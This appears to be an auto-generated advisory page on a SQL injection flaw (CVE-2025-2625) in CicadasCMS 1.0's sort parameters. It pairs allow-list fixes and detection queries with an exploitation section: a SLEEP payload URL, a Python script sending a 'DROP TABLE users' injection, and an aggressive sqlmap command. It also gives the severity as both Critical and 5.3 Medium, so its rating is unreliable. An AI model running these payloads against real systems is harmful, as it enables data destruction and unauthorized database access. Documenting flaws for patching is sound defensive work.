The CVE-2025-2625 vulnerability in Westboy CicadasCMS 1.0 allows remote attackers to execute arbitrary SQL queries via the `orderField` and `orderDirection` parameters in `/system/cms/content/page`. This occurs due to improper input sanitization, enabling SQL injection when these parameters are directly concatenated into SQL statements. Attackers can manipulate these fields to inject malicious SQL payloads, potentially leading to unauthorized data access, modification, or database compromise. The vulnerability is remotely exploitable with low attack complexity, requiring only low privileges.
DailyCVE Form:
Platform: Westboy CicadasCMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 03/26/2025
What Undercode Say:
Exploitation:
1. Payload Example:
/system/cms/content/page?orderField=id;(SELECT SLEEP(5))--&orderDirection=ASC
2. Automated Exploit (Python):
import requests

target = "http://target.com/system/cms/content/page"
payload = {"orderField": "1; DROP TABLE users--", "orderDirection": "ASC"}
response = requests.get(target, params=payload)
3. SQLMap Command:
sqlmap -u "http://target.com/system/cms/content/page?orderField=test&orderDirection=ASC" --risk=3 --level=5
Protection:
1. Patch: Apply vendor updates immediately.
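2. Input Sanitization: Use prepared statements for data values. Placeholders cannot bind column names or the sort direction, so restrict `orderField` and `orderDirection` to an allow-list before they reach the ORDER BY clause:
// Assumed sortable columns ("id", "title"); adjust to the real schema.
$orderField = in_array($orderField, ["id", "title"], true) ? $orderField : "id";
$orderDirection = strtoupper($orderDirection) === "DESC" ? "DESC" : "ASC";
$stmt = $db->prepare("SELECT * FROM pages ORDER BY $orderField $orderDirection");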
3. WAF Rules: Block suspicious SQL keywords in `orderField`/`orderDirection`.
4. Logging: Monitor for unusual SQL errors in logs.
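An allow-list check for the two sort parameters, shown as an added example (not code from CicadasCMS or the original page). The `pages` table, its columns and all function names are assumptions, and SQLite stands in for the CMS database so the block runs offline.

```python
import sqlite3

# Assumption: sortable columns of a hypothetical "pages" table.
ALLOWED_FIELDS = {"id", "title", "created"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def build_order_clause(order_field, order_direction):
    """Return a safe ORDER BY clause, or raise ValueError on unexpected input."""
    direction = str(order_direction or "ASC").strip().upper()
    if order_field not in ALLOWED_FIELDS:
        raise ValueError("orderField not in allow-list")
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("orderDirection must be ASC or DESC")
    # Both tokens are now known constants, so interpolating them is safe.
    return f"ORDER BY {order_field} {direction}"


def list_pages(conn, order_field="id", order_direction="ASC", status="published"):
    clause = build_order_clause(order_field, order_direction)
    # Data values still go through placeholders.
    sql = f"SELECT id, title FROM pages WHERE status = ? {clause}"
    return conn.execute(sql, (status,)).fetchall()


def demo_db():
    """Constructed sample rows in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, created TEXT, status TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?, ?)", [
        (1, "beta", "2025-01-02", "published"),
        (2, "alpha", "2025-01-01", "published"),
        (3, "draft", "2025-01-03", "hidden"),
    ])
    return conn


def is_rejected(order_field, order_direction):
    try:
        build_order_clause(order_field, order_direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(list_pages(demo_db(), "title", "desc"))
    # The sort-field value from the payload example above is refused.
    print(is_rejected("id;(SELECT SLEEP(5))--", "ASC"))
```

Rejecting with an error, rather than silently falling back to a default, also gives the logging step a clear event to alert on.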
Analytics:
- CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L (5.3 Medium)
- Affected Systems: CicadasCMS 1.0 installations with default configs.
- Exploit Availability: Publicly disclosed; weaponization likely.
Detection:
grep -r "orderField.*ORDER BY" /var/www/cicadascms/
-- Database audit query:
SELECT * FROM mysql.general_log WHERE argument LIKE "%orderField%";
Mitigation Steps:
1. Disable direct parameter passing to SQL queries.
2. Restrict database user permissions.
3. Implement rate limiting on `/system/cms/content/page`.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2625
Extra Source Hub:
Undercode